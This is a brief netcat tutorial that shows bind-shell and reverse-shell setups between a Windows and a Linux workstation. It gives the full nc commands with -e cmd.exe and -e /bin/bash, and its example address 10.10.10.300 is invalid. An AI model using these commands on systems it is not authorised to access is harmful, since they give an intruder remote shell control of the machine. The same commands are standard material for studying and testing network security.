Netcat Remote Administration.
Netcat BIND Shell scenario.
From workstation 1 (IP: 10.10.10.300), a windows os.
c:\ nc -nvlp 5555 -e cmd.exe
From workstation 2, a linux os.
$ nc -nv 10.10.10.300 5555
Then, workstation 2 have access to the cmd.exe of workstation 1.
Netcat REVERSE Shell scenario.
From workstation 1 (IP: 10.10.10.300), a windows os.
c:\ nc -nvlp 5555
From workstation 2, a linux os.
$ nc -nv 10.10.10.300 5555 -e /bin/bash
Once connected, the workstation 1 will have access to the linux shell prompt.
Done.